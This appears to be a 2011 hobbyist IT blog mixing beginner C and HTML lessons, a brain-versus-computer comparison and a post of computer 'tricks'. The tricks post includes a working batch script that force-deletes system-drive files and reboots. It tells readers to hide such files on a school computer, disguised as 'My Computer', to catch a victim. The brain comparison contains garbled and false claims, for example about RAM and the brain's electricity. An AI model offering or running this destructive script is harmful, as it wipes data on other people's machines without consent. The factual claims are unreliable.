
Tuesday 7 June 2011

Human Brain Vs. the Computer


             The human brain and the computer are often compared to one another because they can both perform many similar tasks. Computers can perform math, recognize speech and process information. However, both the brain and the computer have strengths and limitations which make them both complementary to each other.

  1. Power

    • Both the brain and a computer use electricity in order to send signals. However, the electricity sent through the brain is based solely on the wiring of the computer, while the human brain uses chemicals like sodium and potassium to transmit electrical signals. The computer powered only by electricity, while the brain requires an assortment of vitamins and minerals in order to continue functioning.


    • Computers can continue to store memories as long as more RAM is added. The information never goes away unless the data is damaged or corrupted in some way. The computer also stores information in a more organized way than the human brain. Also, the memory never changes. However, the human brain sometimes fails to store information, struggles to locate buried information, loses information and sometimes remembers things incorrectly.


    • The human brain adapts to new circumstances and learns new ideas more quickly than the computer, since many new tasks for a computer have to be coded and sometimes must have new hardware developed in order to correspond with the task. However, a computer can manage several tasks simultaneously without error, while some people struggle to walk and chew bubble gum at the same time. The computer can perform calculations faster than the human brain, although the brain has the ability to interpret information, come up with new ideas and be imaginative.


    • Like all machines, the computer is much easier to repair than the human body. To fix a computer, all that needs to be done is for the problem to be identified and fixed or replaced. The human brain cannot have new parts made and must be assisted in healing over a period of time. The computer can also be shut down for a long period of time and repaired later on. The brain will immediately experience damage if shut down and will eventually die.


    • The computer can be continually upgraded and advanced through the development of technology, while the human brain currently cannot be upgraded and can only be strengthened through nutrition and brain exercises. Currently, however, the brain is capable of performing a variety of tasks automatically such as regulating breathing, heartbeat, body temperature and interpreting sensory data while censoring unimportant information. The brain is also able to intuitively adapt to different settings. For instance, an individual can completely shift his tone and wording when moving from a formal to an informal situation.

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Monday 7 March 2011

Learn C programming at iT FuNdA: Lesson 2

Hi dudes!
        Hope you studied and enjoyed previous lesson. In previous lesson we studied that we need a Compiler to translate our C code into Machine executable code and we will use Turbo C 3.0. So in this very lesson we discuss the process of installing and Configuring Turbo C 3.0 on your machines.

Installing and Configuring Turbo C 3.0:

Installing Turbo C 3.0:
       First you have to download Turbo C 3.0 here is the link to download Turbo C3.0                        Click here to Download Turbo C 3.0

    After downloading first of all unzip it and then copy the folder TC to your desired drive I selected C drive
    so I copied the folder naming TC into my C drive in my PC
    Now first go to "C:\TC\BIN"   and double click on icon naming "TC.EXE" 

                                                       In Bin Folder Open TC.EXE

    Now After double clicking on that highlighted icon you will see the first screen of Turbo C3.0 which look  
    like the figure given below. This is Called Integrated development Environment (IDE) of Turbo C3.0.
    In which programs are written, compiled and debugged.

                                                                  IDE of Turbo C 3.0

    Now you have to set directories for input, output and header files. For this purpose click on Option in Menu Bar and then click on directories that appears in the drop down menu which appears after clicking on Options. Then set the Include, Library, Source and output directories as per your requirements but as I told you earlier that I have installed TC in my C drive, so I set these directories as per my PC setting.  Follow the figures given below.

                                                                    Click on Options

                                                                  Click on directories

                                                                 Set directories

  Now its over you have installed and configured Turbo C3.0 on your PC. You can use this IDE to write new    
  programs. In our next lesson we will learn to write our first C Program.

   If have any question please feel free to ask i will try my best to satisfy you.

                                                                     Good bye 
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Sunday 6 March 2011

MS word

Hi friends..
I will teach you MS office 2003 ..
We start it very soon.And also different more courses....

So be here with us on "iT FuNdA"

Shoaib Shah

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Friday 4 March 2011

Learn HTML at iT FuNdA

Dudes  Want to learn web development then Good News for you Here I m starting lessons of HTML for absolute beginners. I will post lesson by lesson HTML and anyone can ask me question frankly about any confusion in HTML. If you want to be a good web developer then you must have a strong hold on HTML. I will write all lesson as readers have no knowledge of web development. HTML is not like Programming it is just a mark up language.You will see that i will try my best to make HTML very easy for people having no Programming background. In Sha Allah 
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Learn C programming at iT FuNdA: Lesson 1

Hi dears!
            With the name of Almighty Allah I am starting first ever lesson of C Programming. If anyone really want to learn programming in C. He/She should read lesson carefully and must practice it.

   So Starting our first lesson with basic concepts from Programming.

            The process of instructing computer to do something is Programming. Computer programming is a set of instruction which causes computer to do some process.
For Example if we want to add two numbers we should instruct computer through some programming language so that computer can understand our instruction and add two numbers.

              The artificial language that have some rules called syntax following which we can write Programs.

              There are three main types of Programming languages based upon understanding level be human and computer. These are    1. Low level Language    2.Middle level Language   3. High Level Language

Low Level Language:
            The language which is directly understandable by computer without any translation is called low level language also called as Machine language. It is the language of 0's and 1's. you often seen a computer code written as 111001010100101 it is written in machine language. Machine language is machine dependent. It varies from machine to machine.

Middle Level Language:
          This Language is the combination of machine code and human language words specially English. Example of middle level Language is Assembly Language.Middle Level Languages need a bit of translation because computer cannot understand English oriented words.

High Level Language:
          This type of languages are purely composed of human oriented Languages specially English. High level Languages must have to be translated in machine code before running or executing. Examples of High level Languages are C, C++, Java, C# etc.

         A software That translates high level code into machine code i-e if one write a program in C, he/she must have to use translator to translate his/her code into machine code so that computer can understand instruction and can execute them.

Types of Translators:
           There are two types of translators i-e Compiler and interpreter. The difference between compiler and interpreter is that Compiler translates the whole code at once but interpreter translates code line by line means one line at a time.

                   Now Coming to our Desired Topic Programming in C  

           C is a structured, procedural programming language that has been widely used both for operating systems and applications and that has had a wide following in the academic community. Many versions of UNIX-based operating systems are written in C. C has been standardized as part of the Portable Operating System Interface

Now what is Structured and Procedural Programming?

        Procedural means in Type of programming when control goes through instruction by instruction to end. Means from Start to bottom control transfers from one statement to another in a sequence no alteration or change in this sequence.

      Structured means type of Programming in which Blocks of codes are created called modules or function or methods which are called when needed and no matter how many times you called them they are written only once. This concept makes C programming very easy, simple and understandable.

          C language is developed by Dennis Ritchie at Bell Laboratories in mid 70's. Although they developed C for system programming but C has proved to be a powerful, flexible language that can be used for developing a variety of applications. C is very popular among Personal Computer Programmers because it is relatively small and requires less memory than other programming languages. Although C is high Level language, but it is very close to assembly language, which increase efficiency of C programs.

Compiler for C:
      As aforementioned C is a high Level language so it needs a Compiler to translates codes into machine language so that computer can understand it and can execute it. There are a variety of compilers for C in market. Some are as under

Microsoft Visual Studio. 
Turbo C
and so on
            I like Microsoft Visual Studio and Turbo C very much because of their user friendly environment. WE will use Turbo C 3.0. For Learning C in this tutorial.

So dudes this is Our First Lesson of C Programming. Hope you all understand and enjoy the whole course and feel free to ask any question about lesson. Good bye
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Learn C programming at iT FuNdA

C Made Easy programming at iT FuNdA :

Dudes Here I m starting lessons for C Programming for absolute beginners. I will post lesson by lesson C Programming and anyone can ask me question frankly about any confusion in C Programming. I will write all lesson as readers have no knowledge of Programming. I read many books about C Programming , in these books normally writers try to confuse readers by relating advanced concepts in earlier chapters. You will see that i will try my best to make C Programming very easy for people having no Programming background. In Sha Allah
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Amazing Tricks


1. At first copy the following binary code exactly:


Paste it in a notepad file.
Save the file as 'whateveryouwish.exe'
When you open it, the hard disk formats!!
You can keep this file in your school's computer in a far-off folder. At first rename it and send a shortcut to desktop. Now hide the original file. Change the icon of the shortcut to that of My computer and rename it as 'My Computer' and delete the original 'My computer'. When someone tries to open it....tada!!
If you are unable to format C drive when the victim's PC is running, then you can use the following line of code:


It's extremely cool!!
How about making the computer not to boot in the first place?? ;)
Then use this code:


You will be astounded at the result when someone tries to restart the PC!

2.Here is another nice trick:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

Save the file as '.bat'

I won't disclose the result!(Just try it out yourself!)
If you hadn't known the above-mentioned tricks before, then google some more up! There are plenty of more wonderful tricks which would just blow your mind!

3.Here is a well-known trick called the 'WTC trick'. The plane that hit the WTC had a flight number of Q33N. Now write 
' Q33N' in notepad, change the font size to 72, and change the font to 'Wingdings'. See what happens....

4.Also try the following trick:
Open notepad and write down: 'this app can break'
Save it as 'xxx.txt'

5.Quit notepad and open it again to have a surprise!
And here is the bummer:
Type down in notepad: 'Bush hid the facts'
Save this file with 'whateveryouwant.txt'

Exit notepad and open it again!

Already mesmerized by the power of notepad? Google some more!!

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Thursday 3 March 2011

Funny Computer Tricks: 
Check out these tips and funny tricks. 

Copy and paste the java script code in the following red lines to the address bar of your browser 

       javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)

      2: Press enter and watch your window's "shaking it".  You can change the value of i if you wish 
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        Come and See iT Exposing at iT FuNdA

        Hi Dudes! Welcome to "iT FuNdA" 

        This is a unique iT blog for iT Lovers. You will find here new and unique content about iT.

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